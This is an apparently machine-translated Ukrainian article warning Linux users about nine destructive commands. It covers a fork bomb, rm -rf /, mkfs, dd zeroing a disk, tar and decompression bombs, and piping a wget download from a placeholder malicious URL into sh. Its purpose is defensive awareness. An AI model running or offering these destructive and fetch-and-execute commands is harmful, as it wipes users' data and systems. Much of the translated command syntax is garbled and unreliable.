Головна » Робочий стіл » 9 Команди та коди Linux, які повинні бути обережними

    9 Команди та коди Linux, які повинні бути обережними

    Команди оболонки / терміналу Linux дуже потужні і просто команда може призвести до видалення папки, файлів або кореневої папки тощо.

    У деяких випадках Linux навіть не попросить вас підтвердити, що він виконає команду відразу, змушуючи вас втрачають цінні дані та інформацію зберігаються в цих файлах і папках.

    Люди часто публікують вміст у мережі рекомендувати нових користувачів Linux для виконання цих команд. Це може здатися жартом для когось, хто розмістив вміст, але це не смішно для людини на іншому кінці.

    Ми зібрали деякі команди Linux, які дуже шкідливі для вашої системи, щоб допомогти вам уникнути їх. Майте на увазі, що вони дійсно небезпечні і можна навіть змінити різними способами для створення нових команд завдати більше шкоди.

    Важливо відзначити, що деякі з цих команд є небезпечними лише в тому випадку, якщо вони мають префікс sudo на Ubuntu. У той час як на інших дистрибутивах Linux більшість з цих команд буде небезпечно виконувати як root.

    Погляньте на 9 команд і кодів ви повинні уникати виконання.

    1. Команда Linux Fork Bomb

    : () : |: & ;: також відомий як Вилка бомба є атакою відмови в обслуговуванні системи Linux. : () : |: & ;: є функцією bash. Після виконання, він повторюється кілька разів, поки система не зависає.

    Ви можете позбутися від неї, лише перезавантаживши систему. Тому будьте уважні при виконанні цієї команди на оболонці Linux.

    2. Папка mv / dev / null Команда

    Папка mv / dev / null це ще одна небезпечна команда. Dev / null або нульовий пристрій є файл пристрою, який відкидає всі записані на ньому дані, але повідомляє, що операція запису виконана успішно. Він також відомий як біт або Чорна діра.

    3. Команда rm -rf

    rm -rf команда є швидким способом видалити папку та її вміст в операційній системі Linux. Якщо ви не знаєте, як правильно її використовувати, то це може стати дуже небезпечним для системи. Найпоширеніші комбінації та параметри, які використовуються з командою rm-rf, наведені нижче:

    • rm Команда використовується для видалення файлів у системі Linux.
    • rm -f команда видаляє файли, доступні лише для читання, в папку без запиту.
    • rm -r команда видаляє вміст папки рекурсивно.
    • rm -d Команда використовується для видалення порожнього каталогу, але він відмовиться видаляти каталог, якщо він не порожній.
    • rm -rf / Команда використовується для примусового видалення (вона видаляє її, навіть якщо вона захищена від запису) всього вмісту в кореневому каталозі та підпапках.
    • rm -rf * Команда використовується для примусового видалення всього вмісту поточного каталогу (каталог, в якому ви зараз працюєте) і підпапок.
    • rm -rf. Команда використовується для примусового видалення всього вмісту поточної теки та підпапок. The rm -r. [^.] * також можна використовувати команду.
    • rm -i Команда використовується для видалення файлів і папок, але перед видаленням з'явиться підказка.

    4. команда mkfs

    mkfs може бути небезпечною командою для системи на базі Linux, якщо ви не знаєте її мети. Все, що написано після того, як mkfs будуть відформатовані і замінені порожньою файловою системою Linux.

    Усі команди, вказані нижче, відформатують жорсткий диск і потребують прав адміністратора:

    • mkfs
    • mkfs.ext3
    • mkfs.bfs
    • mkfs.ext2
    • mkfs.minix
    • mkfs.msdos
    • mkfs.reiserfs
    • mkfs.vfat

    Команда mkfs.cramfs виконуватиме те ж саме, що й вище, але для виконання не потрібні права адміністратора.

    5. Боротьба

    The смола Команда використовується для об'єднання декількох файлів в один файл (архівний файл) в .смола форматі. За допомогою цієї команди можна створити бомбу з стрічковим архівом (Tar).

    це є архівний файл, який вибухає в тисячі або мільйони файлів з іменами, подібними до існуючих файлів у поточний каталог замість того, щоб вносити новий каталог у нерозподілені.

    Ви можете уникнути того, щоб стати жертвою смолистої бомби регулярно створюючи новий захисний каталог, коли ви отримуєте файл tar і потім переміщують отриманий файл tar в цей каталог перед тим, як видалити.

    Якщо файл tar є дійсно бойовою камерою tar, ви можете просто видалити новостворений каталог, щоб позбутися його. Іншим способом уникнути вибуху бомби з каменю є через -t опція для переліку всього вмісту файлу tar щоб дати вам уявлення про тип вмісту, що міститься у файлі tar.

    6. Команда dd

    The dd використовується команда копіювати та перетворювати розділи жорсткого диска. Однак, це може виявитися шкідливим, якщо вказати неправильне місце призначення.

    Команда може бути будь-якою з таких:

    • dd, якщо = / dev / hda = / dev / hdb
    • dd, якщо = / dev / hda = / dev / sdb
    • dd = якщо = = dev / hda
    • dd if = щось від = / dev / sda

    Наступна команда обнулить весь первинний жорсткий диск: dd, якщо = / dev / zero = / dev /

    7. Код сценарію Shell

    Хтось може стати жертвою дає вам посилання на скрипт оболонки та підтверджує, що ви завантажуєте та виконуєте його. Сценарій може містити шкідливий або небезпечний код всередині. The формат команди може виглядати так: wget http: // some_malicious_source -O- | sh. The wget завантажить сценарій, поки sh завантажить виконання сценарію.

    8. Зловмисний вихідний код

    Хтось дає вам вихідний код і просить його скомпілювати. Код може здатися звичайним кодом, але насправді деякий шкідливий код маскується в великий вихідний код і це може завдати шкоди вашій системі. Щоб не стати жертвою такого роду нападу, приймає та компілює вихідний код з надійних джерел.

    9. Бомба декомпресії

    Ви отримали стиснутий файл, і вам буде запропоновано витягти цей файл, який виглядає дуже маленьким за розміром, але може становити кілька КБ. Насправді, цей невеликий стислий файл містить дуже стислі дані.

    Після розпакування файлу витягуються сотні ГБ даних можна заповнити ваш жорсткий диск знизити продуктивність вашої системи. Щоб уникнути цієї ситуації, завжди пам'ятайте, що ви приймаєте дані з надійних джерел.